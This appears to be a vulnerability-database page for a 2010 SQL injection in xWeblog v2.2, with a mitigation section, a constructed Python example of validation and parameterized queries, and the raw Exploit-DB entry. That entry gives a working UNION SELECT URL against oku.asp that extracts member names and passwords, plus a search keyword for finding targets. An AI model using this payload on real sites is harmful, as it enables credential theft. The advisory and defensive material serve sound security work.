Vendor: xWeblog
By: KnocKout
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: xWeblog
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: N/A
Related CWE: N/A
CPE: a:aspdunyasi:xweblog:2.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

xWeblog v2.2 – Remote SQL Injection Vulnerability (tr)

A remote SQL injection vulnerability exists in xWeblog v2.2. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
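
The two mitigation layers above, applied to the `makale_id` parameter from the report, as an added example that is not xWeblog's own code. Python with an in-memory SQLite database stands in for the ASP application and its database; the `makaleler` table, its columns and all rows are constructed assumptions, and only `makale_id`, `uyeler`, `AD` and `SIFRE` come from the report.

```python
import sqlite3
from urllib.parse import unquote_plus

# makale_id value from the request in the report on this page, as sent in the URL.
REPORTED_VALUE = "-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler"


def parse_makale_id(raw):
    """Layer 1: accept only a positive decimal integer of at most 9 digits."""
    value = unquote_plus(raw).strip()
    if not (value.isascii() and value.isdigit() and len(value) <= 9):
        raise ValueError("makale_id must be a positive integer")
    return int(value)


def build_demo_db():
    """Constructed in-memory data; 'makaleler' and its columns are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE makaleler (id INTEGER PRIMARY KEY, baslik TEXT, icerik TEXT);
        CREATE TABLE uyeler (AD TEXT, SIFRE TEXT);
        INSERT INTO makaleler VALUES (67, 'constructed title', 'constructed body');
        INSERT INTO uyeler VALUES ('constructed-user', 'constructed-secret');
    """)
    return conn


ARTICLE_SQL = "SELECT id, baslik, icerik FROM makaleler WHERE id = ?"


def fetch_article(conn, raw_id):
    """Both layers: validate, then bind the integer as a query parameter."""
    return conn.execute(ARTICLE_SQL, (parse_makale_id(raw_id),)).fetchone()


def fetch_article_bound_only(conn, raw_id):
    """Layer 2 alone: unvalidated text is bound as data, never parsed as SQL."""
    return conn.execute(ARTICLE_SQL, (unquote_plus(raw_id),)).fetchone()


if __name__ == "__main__":
    db = build_demo_db()
    print(fetch_article(db, "67"))
    print(fetch_article_bound_only(db, REPORTED_VALUE))
    try:
        fetch_article(db, REPORTED_VALUE)
    except ValueError as exc:
        print("rejected:", exc)
```

Rejected values are also worth logging, since a non-numeric `makale_id` in a request for `oku.asp` is a reliable signal of probing.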

Exploit-DB raw data:

===================================================
xWeblog v2.2 - Remote SQL Injection Vulnerability (tr) 
===================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : xWeblog v2.2
~Software: http://www.aspdunyasi.com/goster.asp?id=19
~Vulnerability Style : (SQLi)
~Google Keywords : "XWEBLOG"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Exploitation ~~~~~~~~~~~
 
    SQL Injection
    ================================
    http://TARGET/path/oku.asp?makale_id=-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler
    ================================
          [+]  SQL Injected!
 
           
       
      GoodLucK ;)


# Inj3ct0r.com [2010-09-28]